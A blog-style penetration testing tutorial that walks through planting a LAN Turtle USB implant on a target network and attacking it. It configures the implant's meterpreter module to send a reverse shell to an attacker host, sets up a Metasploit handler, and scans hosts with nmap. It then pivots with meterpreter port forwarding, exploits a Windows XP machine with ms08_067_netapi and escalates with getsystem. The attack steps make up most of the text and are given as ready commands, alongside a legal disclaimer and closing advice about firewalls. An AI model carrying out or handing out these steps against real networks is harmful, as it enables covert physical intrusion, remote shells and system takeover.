Network Exploitation with LAN Turtle, Kali Linux, and Metasploit

This tutorial is intended to demonstrate the use of LAN Turtle with Kali Linux and Metasploit to find and exploit resources on the network. It is intended for educational purposes only.

THE INSTRUCTIONS AND INFORMATION CONTAINED WITHIN THIS DOCUMENT/PAGE/TUTORIAL ARE FOR EDUCATIONAL PURPOSES ONLY.  EXECUTING THESE INSTRUCTIONS ON ANY SYSTEM(S) THAT YOU DO NOT FULLY OWN AND CONTROL IS VERY LIKELY ILLEGAL WHEREVER YOU LIVE AND YOU WILL BE BREAKING THE LAW IF YOU DO SO. DON’T BREAK THE LAW

To complete this tutorial, you will need the following:

  • A target network with a single or multiple computers running various operating systems (potential victims)
  • Kali Linux 2.0 machine (attacker) or other computers running Metasploit
  • LAN Turtle physical hardware
  • Know how to use metasploit and be willing to do research to learn stuff you’re not familiar with such as specific commands, options, or parameters

First Time Setup

1. Insert the LAN Turtle in a USB port of your attacker computer. Make sure the computer is connected to the internet so you can run updates.

Note: I’m using a terminal on MAC OS but the instructions should work fine if you connect it to a Linux comptuer or Windows with an ssh client installed such as putty.

2. Wait 30 seconds or so until the LAN Turtle boots up. At this point, your computer should recognize it as an external Ethernet Adapter. The LAN Turtle will essentially function as two ethernet adapters, one via the USB port, and the other via the Ethernet port.

3. Plug in an ethernet cable in the LAN Turtle’s ethernet port and ssh to the default static IP address using root@172.16.84.1. You will need to type yes and hit Enter to accept the RSA key.

Note: The default username is root, password is sh3llz. Make sure you change the password after you login, but note that every time you run an update, it will likely reset it to the factory default password.LANTurtle_ssh_to_1724. After logging in, you will be presented with LAN Turtle’s Main Menu (turtle shell). The first thing you should do is download and install the latest updates. You can do so by navigating using the tab and up/down arrow keys on your keyboard to the “Config” option and hit Enter.LANTurtle_main_menu 5. Using the up/down arrow keys, go down to the “Check for updates” option and hit Enter.LANTurtle_check_for_update 6. The LAN Turtle will apply any available updates, after which you can navigate back to the Main Menu and go to the “Modules” option to download modules that you want to use, test, or play with.LANTurtle_select_modules 7. For this tutorial, we will be focusing on the “meterpreter” module which we will configure to send us back a reverse shell on our attacking machine. Once you’ve downloaded all the modules you want, navigate back to the Main Menu and highlight the “meterpreter” module to select it and hit Enter.LANTurtle_select_modules_meterpreter8. In the “meterpreter” configuration options, we just need to provide two settings/parameters. The IP address of our attacker machine (which can be anywhere in the world), and the port number which the “meterpreter” handler will be listening on to receive the shell from the LAN Turtle

Note: In the example below, my Kali Linux attacker machine’s IP address is 192.168.1.115, and I chose port 8080 for testing purposes. This port number could be any available port really, but ideally something that most places/environments would allow to go out by default such as ports 80 and 443 which are used for general internet traffic.LANTurtle_modules_meterpreter_config9. Enter your settings, and hit Submit to go back to the module options screen to enable and start it. Enabling the module means it will automatically run next time it’s plugged into any computer, and starting it will start it immediately. In other words, even if you don’t start it right then, if you unplug it and plug it back in, it will automatically start. I’m will ahead and start it anyway, but we won’t see any reverse shells yet because we still need to setup our handler on the Kali Linux attacker machine which will receive the LAN Turtle meterpreter shell. Once you start it, you should see a scree similar to the one below where it prints out the process id (pid) that it started under.LANTurtle_modules_meterpreter_start LANTurtle_modules_meterpreter_enabled_started Now, let’s go setup our attacker machine to receive the LAN Turtle reverse shell. Since we started the module, the LAN Turtle is going to continuously send packets trying to reach the IP address and port we specified, so it will create some “noise” on the network.

NOTE: At this point, you’re done with setting up the LAN Turlte. You can disconnect it from your attacker computer and plug it into the Target victim computer and network which you will be attempting to compromise. Again, stay legal and do this on your own network to learn and practice. 

10. On your attacker machine, start up metasploit and configure it to listen on the IP address and port you specified in step 8. The screenshot below outlines the steps/commands you need to execute.

Note: The meterpreter module on the LAN turtle uses the php/meterpreter/reverse_tcp PAYLOAD, so don’t try others as they are very likely not going to work. bash terminal# msfconsole Inside metaspoit run: use exploit/multi/handler set PAYLOAD php/meterpreter/reverse_tcp set LHOST 192.168.1.115 set LPORT 8080 set ExitOnSession false exploit -jLANTurtle_msf_setup Note: you can also put and save these commands in a text file (with .rc extension) and pass it on to metasploit as a parameter when you first run it. Example# msfconsole -r lanTurtle.rc As soon as you hit Enter after “exploit -j”, you should see a meterpreter session open. That’s basically the LAN Turtle finally finding it’s destination we told it to look for. We can see below that we have session 1 opened from 192.168.1.200 (which is the IP address that the ethernet port of the LAN Turtle that was automatically assigned by the DHCP server running on the target victim network)

11. Let’s interact with our session by typing “sessions -i 1″ in metasploit and hitting Enter. Once you have the “meterpreter>” prompt, you can execute all kinds of commands, including obtaining an interactive shell on the LAN Turtle, which is what we will do next.

Note: After you see “Channel 0 created” you can validate that you have a shell by typing “id” and hitting Enter. There are various reasons why that shell doesn’t look like your familiar shell that has a prompt such as hostname#. We can easily fix that however by having python spawn a new shell for us by executing the following command: python -c ‘import pty;pty.spawn(“/bin/bash”)’LANTurtle_msf_session_open12. Now that we have a full shell on the LAN Turtle which is connected to our target victim’s network, we need to start looking around to find out what other hosts are on the network which may be running vulnerable operating systems, applications, or services. A quick way to do that is to perform a quick scan using nmap by executing the following command: nmap -T4 -F 192.168.2-254

Note: Because i’m running this in my own lab environment, I chose the range where i’m running my lab virtual machines. The IP addresses you use will vary depending on your network or the target victim’s network. Your clue to the range you scan should be the IP address of the LAN Turtle that connected to session 1, which is 192.168.1.200. Another tip is not to try any intensive scans right off the bat as this will very likely keep killing your meterpreter session. You can also play with the nmap scan module built into the LAN Turtle, but it was easier just to do this the old fashion way. The screenshot below shows several hosts identified on the network after we ran our nmap scan, as well as various port numbers, which should now start giving us an idea which hosts are alive, and what services they may be running.LANTurtle_nmap_discovery2From here on, you can starting honing in on interesting hosts and running more intense targeted nmap scans against those hosts to find out more information. For example, I noticed that host 192.168.1.206 had ports 445, 135, and 139 open, which leads me to believe it’s a Microsoft Windows OS.

13. Let’s run another slightly more intensive nmap scan to see what we can get. nmap -sV -T4 -0 -F –version-light 192.168.1.206 While not perfect, it does narrow down the field a bit when we see “Microsoft XP SP2” as a potential match under OS details.LANTurtle_nmap_wxpsp2 Next Steps? Ok, so how do we move on from here? We still don’t have direct access to the network to run metasploit on the LAN Turtle, so how will we attempt to exploit the Windows XP SP2 machine? Lucky for us, and kudos to the awesome creators of the meterpreter shell, we have the option of forwarding traffic using the “portfwd” command. Essentially, we’re going to tell the meterpreter shell if you see traffic coming on a specific port, go ahead and redirect it to another host and port number. That sounds like it should work, right? Well, let’s give it a try.

14. First, to exit from the interactive shell and return to the meterpreter shell where we need to setup the port forwarding, press Ctrl+C on your keyboard. Once you’re back at the meterpreter> shell, execute the following command: portfwd add -l 449 -p 445 -r 192.168.1.206

Explanation: Port 449 is the local port that will be mapped to our local attacker machine which use 127.0.0.1 by default, and everything we send to it will be redirected to port 445 on the target victim machine 192.168.1.206LANTurtle_msf_portfwd 15. Now that we have a way to exploit our target victim Windows XP SP2 machine, let’s get rolling. If you’re not familiar with potential exploits targeting a specific operating system or application, you can search metasploit using the “search” term followed by any relevant text, or, you can use the appropriate syntax/keywords such as “search type:exploit platform:windows” Let’s give the good old ms08_067_netapi exploit a try against our target Windows XP SP2 victim machine we found on the target network.

Note: Remember the port forwarding we did, so now we have to pay attention and make sure that the rhost and rport parameters are pointing to our localhost and the port we specified earlier. set rhost 127.0.0.1 set rport 449 Everything else should be familiar (or you need to research it). You still need to define a payload. I’m going to use windows/meterpreter/reverse_tcp and have it listen on port 4444.LANTurtle_msf_ms08_06716. We now have everything ready to attempt our exploit. All we have to do is type exploit and hit Enter! Let’s give it a try.LANTurtle_msf_ms08_067_exploitedAnd guess what? It worked! We now have session 2 opened from our Windows XP SP2 victim machine. The next logical steps would be to figure out under what account/credential we’re running, what privileges we have, and try to escalate privileges if needed so we can ultimately end up with system or administrator privileges.To that end, the first thing you should do is run the “getsystem” command, which will automatically attempt to use known exploits to obtain system privileges.

17. On the meterpreter> shell, type getsytem and hit Enter. Voila! I don’t need to say anymore other than the fact that if that Windows XP SP2 victim machine had the firewall turned on, this exploit would not have worked! I know because I tried it. LANTurtle_msf_ms08_067_got_systemThe moral of this exercise (aside from making sure you don’t let people you don’t know in your office/network that can plug in malicious devices), even if you’re running an old/legacy OS, the least you can do is turn on the firewall! This only helps with the OS part though, if you’re running any services such as FTP, Telnet, or Web Services on top of the OS, they have their own vulnerabilities and could be exploited as well! And to that end, make sure you stay tuned for other topics and tutorials which will be getting into just that!

Leave a Comment